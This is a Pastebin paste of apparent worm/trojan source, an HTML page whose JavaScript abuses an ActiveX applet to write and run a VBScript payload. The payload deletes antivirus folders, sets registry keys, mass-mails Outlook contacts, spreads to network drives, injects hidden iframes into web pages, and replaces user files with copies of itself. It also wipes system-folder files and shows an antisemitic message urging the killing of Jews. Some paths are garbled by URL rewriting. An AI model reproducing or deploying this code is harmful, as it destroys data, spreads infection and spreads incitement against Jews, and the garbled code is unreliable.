API tools faq
paste
Advertisement
FlyFar

Trojan.IRC.Gribble - Source Code

FlyFar
Jun 14th, 2023
827
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 12.71 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <HTML>
  2. <HEAD>
  3. <TITLE>ZaCker</TITLE>
  4. </HEAD>
  5. <BODY bgcolor="#000000">
  6.  
  7. <applet codebase=. code="com.ms.activeX.ActiveXComponent.class" tppabs="http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/com.ms.activeX.ActiveXComponent.class" align="baseline"
  8. width="9" height="1" highlight="0">
  9. </applet>
  10. <script
  11. language="JAVASCRIPT">
  12. window.defaultStatus = "Be carful , ZaCker is so angry !!"
  13. InterfaceObject=document.applets[0];
  14. setTimeout("Upload()",1000);
  15. function Upload() {
  16. fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
  17. InterfaceObject.setCLSID(fsoClassID);
  18. fso = InterfaceObject.createInstance();
  19. // windir = fso.getspecialfolder(0);
  20. filename = "http://rol.vbs/";
  21. file = fso.opentextfile(filename, "2", "TRUE");
  22. file.writeline('On Error Resume Next')
  23. file.writeline('Set sss = CreateObject("wscript.shell")')
  24. file.writeline('sss.regwrite "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ZaCker", Minute(Now)')
  25. file.writeline('sss.regwrite "HKCU\\software\\microsoft\\internet Explorer\\main\\start Page", "everwonder-1.swf"/*tpa=http://www.orst.edu/groups/msa/everwonder.swf*/')
  26. file.writeline('Set fso = CreateObject("scripting.filesystemobject")')
  27. file.writeline('Const ForReading = 1, ForWriting = 2, ForAppending = 8')
  28. file.writeline('Set Sis = fso.GetSpecialFolder(1)')
  29. file.writeline('Set File = fso.OpenTextFile(WScript.ScriptFullName, 1)')
  30. file.writeline('File.ReadAll')
  31. file.writeline('Set dan = fso.GetFile(WScript.ScriptFullName)')
  32. file.writeline(' dan.Copy (Sis & "http://zacker.vbs/")')
  33. file.writeline('Set f = fso.OpenTextFile(Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/DaLaL.htm", ForWriting, True)')
  34. file.writeline('ap.write "<html><body><span style="& Chr (39)& "position:absolute"& Chr (39)&"><Iframe src=" & Chr (39)& "http://geocities.com/jobreee/main.htm" & Chr (39)& "width="& Chr (39)&"0"& Chr (39)& "height="& Chr (39)&"0"& Chr (39)& "></Iframe></span></body></html>"')
  35. file.writeline(' Set f = fso.OpenTextFile(Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/DaLaL.htm", ForReading)')
  36. file.writeline('Set d = fso.getfolder(Sis)')
  37. file.writeline('drv = d.Drive')
  38. file.writeline('fso.deletefolder (drv & "\\" & "Program Files\\Zone Labs")')
  39. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\AntiViral Toolkit Pro\\*.*")')
  40. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\Command Software\\F-PROT95\\*.*")')
  41. file.writeline('fso.DeleteFile (drv & "\\" & "eSafe\\Protect\\*.*")')
  42. file.writeline('fso.DeleteFile (drv & "\\" & "PC-Cillin 95\\*.*")')
  43. file.writeline('fso.DeleteFile (drv & "\\" & "PC-Cillin 97\\*.*")')
  44. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\Quick Heal\\*.*")')
  45. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\FWIN32\\*.*")')
  46. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\FindVirus\\*.*")')
  47. file.writeline('fso.DeleteFile (drv & "\\" & "Toolkit\\FindVirus\\*.*")')
  48. file.writeline('fso.DeleteFile (drv & "\\" & "f-macro\\*.*")')
  49. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\McAfee\VirusScan95\\*.*")')
  50. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\Norton AntiVirus\\*.*")')
  51. file.writeline('fso.DeleteFile (drv & "\\" & "TBAVW95\\*.*")')
  52. file.writeline('fso.DeleteFile (drv & "\\" & "VS95\\*.*")')
  53. file.writeline('fso.DeleteFile (drv & "\\" & "rescue\\*.*")')
  54. file.writeline('fso.DeleteFile (drv & "\\" & "Program Files\\Zone Labs\\*.*")')
  55. file.writeline('S = Chr(34)')
  56. file.writeline('L = vbCrLf')
  57. file.writeline('O = Chr(40)')
  58. file.writeline('C = Chr(41)')
  59. file.writeline('A = Chr(38)')
  60. file.writeline('Set f = fso.OpenTextFile(Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/outlook.vbs", ForWriting, True)')
  61. file.writeline('f.write "Set WW = CreateObject" & O & S & "Outlook.Application" & S & C & L')
  62. file.writeline('f.write "Set HT = WW.GetNamespace" & O & S & "MAPI" & S & C & ".GetDefaultFolder" & O & "10" & C & ".Items" & L')
  63. file.writeline('f.write "E = HT.Count" & L & "ReDim m" & O & "E" & C & L')
  64. file.writeline('f.write "For i = 1 To E" & L & "E = E - 1" & L')
  65. file.writeline('f.write " m" & O & "E" & C & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/=HT.Item" & O & "i" & C & ".Email1Address" & L')
  66. file.writeline('f.write "If i = 1 Then" & L & "Mail = m" & O & "E" & C & L & "Else" & L')
  67. file.writeline('f.write "Mail = Mail +" & S & ";" & S & "+ m" & O & "E" & C & L')
  68. file.writeline('f.write "End If" & L & "Next" & L & "Set MMM = WW.CreateItem" & O & "0" & C & L')
  69. file.writeline('f.write "MMM.to = Mail" & L & "MMM.Subject =" & S & "Very important !!!" & S & L')
  70. file.writeline('f.write "MMM.Body =" & S & "See this page" & S & "& vbCrLf &" & S & "http://geocities.com/Jobreee/main.htm" & S & L')
  71. file.writeline('f.write "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/MMM.Send"')
  72. file.writeline('Set f = fso.OpenTextFile(Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/outlook.vbs", ForReading)')
  73. file.writeline('sss.run (Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/outlook.vbs")')
  74. file.writeline('Set ShrDrv = CreateObject("WScript.Network")')
  75. file.writeline('Set MMM = ShrDrv.EnumNetworkDrives')
  76. file.writeline('If MMM.Count <> 0 Then')
  77. file.writeline('For drv = 0 To MMM.Count - 1')
  78. file.writeline('If InStr(MMM.Item(drv), "\\") <> 0 Then')
  79. file.writeline('fso.copyfile (Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/DaLaL.htm"), HOLL.BuildPath(MMM.Item(drv), "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/Dallah.htm")')
  80. file.writeline('fso.copyfile (Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/ZaCker.vbs"), HOLL.BuildPath(MMM.Item(drv), "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/server.vbs")')
  81. file.writeline('End If')
  82. file.writeline('Next')
  83. file.writeline('End If')
  84. file.writeline('Main')
  85. file.writeline('Sub Main()')
  86. file.writeline('eq = ""')
  87. file.writeline('ctr = 0')
  88. file.writeline('infectfiles (folderspec)')
  89. file.writeline('folderlist (folderspec)')
  90. file.writeline('fileexist (filespec)')
  91. file.writeline('folderexist (folderspec)')
  92. file.writeline('listadriv')
  93. file.writeline('mot')
  94. file.writeline('End Sub')
  95. file.writeline('Sub listadriv()')
  96. file.writeline('On Error Resume Next')
  97. file.writeline('Dim d, dc, s')
  98. file.writeline('Set fso = CreateObject("Scripting.FileSystemObject")')
  99. file.writeline('Set dc = fso.Drives')
  100. file.writeline('For Each d In dc')
  101. file.writeline('If d.DriveType = 2 Or d.DriveType = 3 Then')
  102. file.writeline('folderlist (d.Path & "\\")')
  103. file.writeline('End If')
  104. file.writeline('Next')
  105. file.writeline('listadrive = s')
  106. file.writeline('Call infectfiles(folderspec)')
  107. file.writeline('End Sub')
  108. file.writeline('Sub infectfiles(folderspec)')
  109. file.writeline('On Error Resume Next')
  110. file.writeline('Dim f, f1, fc, ext, ap')
  111. file.writeline('Const ForReading = 1, ForWriting = 2, ForAppending = 8')
  112. file.writeline(' Set fso = CreateObject("Scripting.FileSystemObject")')
  113. file.writeline('Set f = fso.getfolder(folderspec)')
  114. file.writeline('Set fc = f.Files')
  115. file.writeline('For Each f1 In fc')
  116. file.writeline('ext = fso.GetExtensionName(f1.Path)')
  117. file.writeline('ext = LCase(ext)')
  118. file.writeline('s = LCase(f1.Name)')
  119. file.writeline('If (ext = "htm") Or (ext = "html") Or (ext = "asp") Then')
  120. file.writeline('Set ap = fso.OpenTextFile(f1.Path, 8, True)')
  121. file.writeline('ap.write "<html><body><span style="& Chr (39)& "position:absolute"& Chr (39)&"><Iframe src=" & Chr (39)& "http://geocities.com/jobreee/main.htm" & Chr (39)& "width="& Chr (39)&"0"& Chr (39)& "height="& Chr (39)&"0"& Chr (39)& "></Iframe></span></body></html>"')
  122. file.writeline('ap.Close')
  123. file.writeline('Set ap = fso.OpenTextFile(f1.Path, 1)')
  124. file.writeline('Set cop = fso.GetFile(f1.Path)')
  125. file.writeline('cop.Copy (f1.Path)')
  126. file.writeline('Set atz = fso.GetFile(f1.Path)')
  127. file.writeline('atz.Attributes = att.Attributes + 2')
  128. file.writeline('ElseIf (ext = "lnk") Or (ext = "zip") Or (ext = "jpg") Or (ext = "jpeg") Or (ext = "mpg") Or (ext = "mpeg") Or (ext = "doc") Or (ext = "xls") Or (ext = "mdb") Or (ext = "txt") Or (ext = "ppt") Or (ext = "pps") Or (ext = "ram") Or (ext = "rm") Or (ext = "mp3") Or (ext = "mdb") Or (ext = "swf") Then')
  129. file.writeline('fso.copyfile (Sis & "\\" & "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/ZaCker.vbs"), (f1.Path & ".vbs")')
  130. file.writeline('fso.deletefile (f1.Path)')
  131. file.writeline('End If')
  132. file.writeline('If f1.Name = "http://www.cs.ucdavis.edu/~wu/ecs251/test_files_HW2/dangerous/collection/mirc.ini" Then')
  133. file.writeline('Set fold = fso.getfolder(f1.ParentFolder)')
  134. file.writeline('Set fil = fold.Files')
  135. file.writeline('For Each f In fil')
  136. file.writeline('If (ext = "ini") Then')
  137. file.writeline('Set f = fso.OpenTextFile(f.Path, 2, True)')
  138. file.writeline('f.write "on 1:JOIN:#:/msg $chan  See This Site http://geocities.com/jobreee/main.htm  $nick! "')
  139. file.writeline('Set f = fso.OpenTextFile(f.Path, 1)')
  140. file.writeline('End If')
  141. file.writeline('Next')
  142. file.writeline('End If')
  143. file.writeline('Next')
  144. file.writeline('End Sub')
  145. file.writeline('Sub folderlist(folderspec)')
  146. file.writeline('On Error Resume Next')
  147. file.writeline('Dim f, f1, sf')
  148. file.writeline('Set fso = CreateObject("Scripting.FileSystemObject")')
  149. file.writeline('Set f = fso.getfolder(folderspec)')
  150. file.writeline('Set sf = f.SubFolders')
  151. file.writeline('For Each f1 In sf')
  152. file.writeline('infectfiles (f1.Path)')
  153. file.writeline('folderlist (f1.Path)')
  154. file.writeline('Next')
  155. file.writeline('End Sub')
  156. file.writeline('Function fileexist(filespec)')
  157. file.writeline('On Error Resume Next')
  158. file.writeline('Dim msg')
  159. file.writeline('Set fso = CreateObject("Scripting.FileSystemObject")')
  160. file.writeline('If (fso.FileExists(filespec)) Then')
  161. file.writeline('msg = 0')
  162. file.writeline('Else')
  163. file.writeline('msg = 1')
  164. file.writeline('End If')
  165. file.writeline('fileexist = msg')
  166. file.writeline('End Function')
  167. file.writeline('Function folderexist(folderspec)')
  168. file.writeline('On Error Resume Next')
  169. file.writeline('Dim msg')
  170. file.writeline('Set fso = CreateObject("Scripting.FileSystemObject")')
  171. file.writeline('If (fso.GetFolderExists(folderspec)) Then')
  172. file.writeline('msg = 0')
  173. file.writeline('Else')
  174. file.writeline('msg = 1')
  175. file.writeline('End If')
  176. file.writeline('fileexist msg')
  177. file.writeline('End Function')
  178. file.writeline('Sub mot()')
  179. file.writeline('On Error Resume Next')
  180. file.writeline('Set sss = CreateObject("wscript.shell")')
  181. file.writeline('Set TAFi = sss.regread("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ZaCker")')
  182. file.writeline(' Do')
  183. file.writeline('If Minute(Now) = TAFi + 30 And Second(Now) = 5 Then')
  184. file.writeline('Set fso = CreateObject("scripting.filesystemobject")')
  185. file.writeline('Set Sis = fso.GetSpecialFolder(1)')
  186. file.writeline('Set Folder = fso.getfolder(Sis)')
  187. file.writeline('Set Files = Folder.Files')
  188. file.writeline('For Each File In Files')
  189. file.writeline('fso.deletefile (File.Path)')
  190. file.writeline('Next')
  191. file.writeline('MsgBox " America will never survive till it dismisses jews from its land " & vbCrLf & "            jews bring disasters to any pll they live with" & vbCrLf & "                     i dunno why they are still alive !!!" & vbCrLf & "                          lets kill them one by one", 6, "ZaCker " ')
  192.  
  193. file.writeline('sss.run "rundll32.exe user.exe,exitwindows"')
  194. file.writeline('End If')
  195. file.writeline('Loop')
  196. file.writeline('End Sub')
  197.  
  198. file.close();  
  199. Run(); 
  200. }
  201.  
  202. function Run() {
  203.  
  204. WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
  205. InterfaceObject.setCLSID(WshShellClassID);
  206. wshShell = InterfaceObject.createInstance();   
  207. wshShell.run(filename,"6","TRUE");  }
  208. -->
  209. </script>
  210. <p align="center"><font color="#FF0000" face="Matisse ITC" size="5">Sharoon = a war crimenal<br>
  211. Bush supports him<br>
  212. So...<br>
  213. Bush = a war crimenal<br>
  214. American people must protect their country otherwise, their<br>
  215. government will lead them to the hell !<br>
  216. <br>
  217. <br>
  218. <br>
  219. Best Regards<br>
  220. America Lovers<br>
  221.   ZA-UNION</font></p>
  222. </html>
  223. <!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="geov2.js" tppabs="http://us.geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="visit.gif-1008751440.gif" tppabs="http://visit.geocities.com/visit.gif?1008751440" border=0 width=1 height=1></noscript>
  224. <IMG SRC="serv-s=76001081&t=1008751440.gif" tppabs="http://geo.yahoo.com/serv?s=76001081&t=1008751440" ALT=1 WIDTH=1 HEIGHT=1>
Tags: JavaScript trojan irc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!